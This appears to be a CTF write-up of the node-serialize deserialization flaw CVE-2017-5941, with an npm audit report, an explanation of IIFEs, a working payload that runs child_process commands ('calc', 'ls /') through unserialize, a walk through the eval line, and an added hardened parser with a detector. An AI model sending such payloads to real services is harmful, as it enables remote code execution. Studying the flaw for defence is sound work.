Node.js deserialization (CVE-2017-5941) seen through bigfish from the 2024 CISCN East/South China finals

A pity the box had no network access; it is a very simple CVE, so this is a quick study of it.

After the contest I got hold of the attachment and started analysing it.

First install all the dependencies:

npm install


As soon as the install finished I saw a pile of vulnerabilities, quite a few of them high severity, so I ran npm audit to check the dependencies:

PS D:\Desktop\2024-CISCN-华东南-web\Web-bigfish> npm audit
# npm audit report

express-jwt <=7.7.7 || 8.3.0
Severity: high
Authorization bypass in express-jwt - https://github.com/advisories/GHSA-6g6m-m6h5-w9gf
Depends on vulnerable versions of jsonwebtoken
Depends on vulnerable versions of lodash.set
fix available via `npm audit fix --force`
Will install express-jwt@8.4.1, which is a breaking change
node_modules/express-jwt

hoek *
Severity: high
Prototype Pollution in hoek - https://github.com/advisories/GHSA-jp4x-w63m-7wgm
hoek subject to prototype pollution via the clone function. - https://github.com/advisories/GHSA-c429-5p7v-vgjp
fix available via `npm audit fix --force`
Will install jsonwebtoken@9.0.2, which is a breaking change
node_modules/hoek
joi 0.0.2 - 8.0.5
Depends on vulnerable versions of hoek
Depends on vulnerable versions of topo
node_modules/joi
jsonwebtoken <=8.5.1
Depends on vulnerable versions of joi
node_modules/express-jwt/node_modules/jsonwebtoken
node_modules/jsonwebtoken
topo <=2.0.0
Depends on vulnerable versions of hoek
node_modules/topo

html-minifier *
Severity: high
kangax html-minifier REDoS vulnerability - https://github.com/advisories/GHSA-pfq8-rq6v-vf5m
fix available via `npm audit fix --force`
Will install art-template@4.1.0, which is a breaking change
node_modules/html-minifier
art-template >=4.2.0
Depends on vulnerable versions of html-minifier
node_modules/art-template


lodash <=4.17.20
Severity: critical
Regular Expression Denial of Service (ReDoS) in lodash - https://github.com/advisories/GHSA-x5rq-j2xg-h7qm
Prototype Pollution in lodash - https://github.com/advisories/GHSA-4xc9-xhrj-v574
Regular Expression Denial of Service (ReDoS) in lodash - https://github.com/advisories/GHSA-29mw-wpgm-hmr9
Prototype Pollution in lodash - https://github.com/advisories/GHSA-p6mc-m468-83gw
Command Injection in lodash - https://github.com/advisories/GHSA-35jh-r3h4-6jhm
Prototype Pollution in lodash - https://github.com/advisories/GHSA-fvqr-27wr-82fm
Prototype Pollution in lodash - https://github.com/advisories/GHSA-jf85-cpcp-j695
No fix available
node_modules/lodash
xmlbuilder 2.5.0 - 4.2.0
Depends on vulnerable versions of lodash
node_modules/xmlbuilder
plist <=3.0.4
Depends on vulnerable versions of xmlbuilder
Depends on vulnerable versions of xmldom
node_modules/plist
chrome *
Depends on vulnerable versions of plist
node_modules/chrome

lodash.set *
Severity: high
Prototype Pollution in lodash - https://github.com/advisories/GHSA-p6mc-m468-83gw
fix available via `npm audit fix --force`
Will install express-jwt@8.4.1, which is a breaking change
node_modules/lodash.set

node-serialize *
Severity: critical
Code Execution through IIFE in node-serialize - https://github.com/advisories/GHSA-q4v7-4rhw-9hqm
No fix available
node_modules/node-serialize


xmldom *
Severity: critical
Misinterpretation of malicious XML input - https://github.com/advisories/GHSA-h6q6-9hqw-rwfv
xmldom allows multiple root nodes in a DOM - https://github.com/advisories/GHSA-crh6-fp67-6883
Misinterpretation of malicious XML input - https://github.com/advisories/GHSA-5fg8-2547-mr8q
No fix available
node_modules/xmldom

14 vulnerabilities (9 high, 5 critical)

To address all issues possible (including breaking changes), run:
npm audit fix --force

Some issues need review, and may require choosing
a different dependency.

Note that node-serialize here is version 0.0.4, which is affected by CVE-2017-5941. npm audit flags every version of it (`node-serialize *`, "No fix available"), so this is not something an upgrade solves; the dependency has to be replaced.

IIFE expressions

Immediately Invoked Function Expression - MDN Web Docs Glossary: Definitions of Web-related terms | MDN (mozilla.org)

Going through the docs: an IIFE builds an anonymous function, wraps the whole function expression in parentheses, and then immediately follows it with another pair of parentheses.

That is, it is an immediately invoked function expression: JavaScript runs the function the moment the expression is evaluated, without anyone having to call it later.

(function(){ /* code */ }());
// 或者
(function(){ /* code */ })();

Take a function like this:

(function(){console.log("1212")})()


As soon as the script runs, the function is invoked and prints its output; nothing else in the program has to reference it.

Vulnerability exploit

const serialize = require('node-serialize');
// A normal object holding a function. serialize() turns the function into a
// string prefixed with the marker _$$ND_FUNC$$_ followed by its source text.
var test = {
rce : function(){require('child_process').exec('ls /',function(error, stdout, stderr){console.log(stdout)});},
}
var payload = serialize.serialize(test)
// The serialized form is only a function definition; the exploit appends "()"
// so that the body runs inside eval() while unserialize() is still parsing.
payload="{\"rce\":\"_$$ND_FUNC$$_function(){require('child_process').exec('calc',function(error, stdout, stderr){console.log(stdout)});}()\"}"
serialize.unserialize(payload);

Stepping through the vulnerable code


unserialize() first runs the input through JSON.parse, then walks the resulting object key by key, checking the type of each value.

The key part is this line:

obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');

At this point obj[key] holds our payload string.


substring() then drops the first FUNCFLAG.length characters, i.e. the `_$$ND_FUNC$$_` marker, leaving only the function text.

Wrapped in parentheses, that gives the string:

"(function(){require('child_process').exec('calc',function(error, stdout, stderr){console.log(stdout)});}())"

This is handed to eval(). Because the payload ends in `()`, the wrapped text is an immediately invoked function expression, so the function body, child_process call included, executes inside unserialize() itself. The application never has to call the function; parsing the input is enough for code execution.

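The walk described in the exploit and debugging sections above, reduced to something runnable. This is an added example, not code from the writeup or from node-serialize: vulnerableUnserialize() mirrors the eval step in simplified form, while safeUnserialize() and findFunctionMarkers() are hypothetical hardening and detection helpers. The payloads are constructed; they bump a counter on globalThis in place of child_process so the demo is safe to run, and the second payload omits the trailing `()` to show that without it the function is only defined, not executed.

```javascript
// Added example, not code from the writeup or from node-serialize itself:
// a stripped-down reimplementation of the unserialize() walk the post
// debugs, beside a hardened replacement and a detector for the IIFE trick.
// FUNCFLAG is the marker node-serialize prefixes to serialized functions.
const FUNCFLAG = '_$$ND_FUNC$$_';

// Vulnerable walk: every string value starting with FUNCFLAG is handed to
// eval wrapped in parentheses, exactly the step the writeup stops on.
function vulnerableUnserialize(input) {
  const obj = typeof input === 'string' ? JSON.parse(input) : input;
  for (const key of Object.keys(obj)) {
    const v = obj[key];
    if (v !== null && typeof v === 'object') {
      obj[key] = vulnerableUnserialize(v);
    } else if (typeof v === 'string' && v.startsWith(FUNCFLAG)) {
      obj[key] = eval('(' + v.substring(FUNCFLAG.length) + ')');
    }
  }
  return obj;
}

// Hardened replacement (hypothetical): plain JSON.parse, and any value that
// carries the function marker is rejected instead of evaluated. Functions
// simply do not round-trip through untrusted input.
function safeUnserialize(json) {
  const obj = JSON.parse(json);
  const walk = (node) => {
    for (const v of Object.values(node)) {
      if (typeof v === 'string' && v.startsWith(FUNCFLAG)) {
        throw new Error('refusing to deserialize a function marker');
      }
      if (v !== null && typeof v === 'object') walk(v);
    }
  };
  walk(obj);
  return obj;
}

// Detector (hypothetical) for request bodies or logs: lists every FUNCFLAG
// string and whether it is immediately invoked. serialize() output ends in
// "}"; a trailing ")" means the function text is followed by a call.
function findFunctionMarkers(json) {
  const hits = [];
  const walk = (node, path) => {
    for (const [k, v] of Object.entries(node)) {
      const here = path ? path + '.' + k : k;
      if (typeof v === 'string' && v.startsWith(FUNCFLAG)) {
        const body = v.substring(FUNCFLAG.length).trim();
        hits.push({ key: here, immediate: body.endsWith(')') });
      } else if (v !== null && typeof v === 'object') {
        walk(v, here);
      }
    }
  };
  walk(JSON.parse(json), '');
  return hits;
}

// Constructed payloads (assumption: the side effect is a counter on
// globalThis instead of child_process, so the demo is safe to run).
const FUNC_BODY =
  'function(){ globalThis.__ndDemoRan = (globalThis.__ndDemoRan || 0) + 1; return "ran"; }';
const IIFE_PAYLOAD = JSON.stringify({ rce: FUNCFLAG + FUNC_BODY + '()', name: 'bigfish' });
const DEFERRED_PAYLOAD = JSON.stringify({ rce: FUNCFLAG + FUNC_BODY, name: 'bigfish' });

function demo() {
  globalThis.__ndDemoRan = 0;
  const a = vulnerableUnserialize(IIFE_PAYLOAD);      // body runs inside eval
  const b = vulnerableUnserialize(DEFERRED_PAYLOAD);  // only a function object
  console.log('IIFE payload ran', globalThis.__ndDemoRan, 'time(s); rce =', a.rce);
  console.log('deferred payload yields a', typeof b.rce, 'without running it');
  console.log('markers:', findFunctionMarkers(IIFE_PAYLOAD));
  try {
    safeUnserialize(IIFE_PAYLOAD);
  } catch (e) {
    console.log('safeUnserialize rejected it:', e.message);
  }
}

if (typeof require !== 'undefined' && require.main === module) demo();
```

The detector's `immediate` flag only tells you which payloads fire at parse time; a marker without the trailing `()` is still a function the application may call later, so a hardened service should reject any FUNCFLAG string, as safeUnserialize() does, rather than only the immediately invoked ones.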

Solving the challenge

[screenshot: the challenge route that calls unserialize]

This route deserializes its input with node-serialize, an obvious sink; sending it the payload above is all it takes.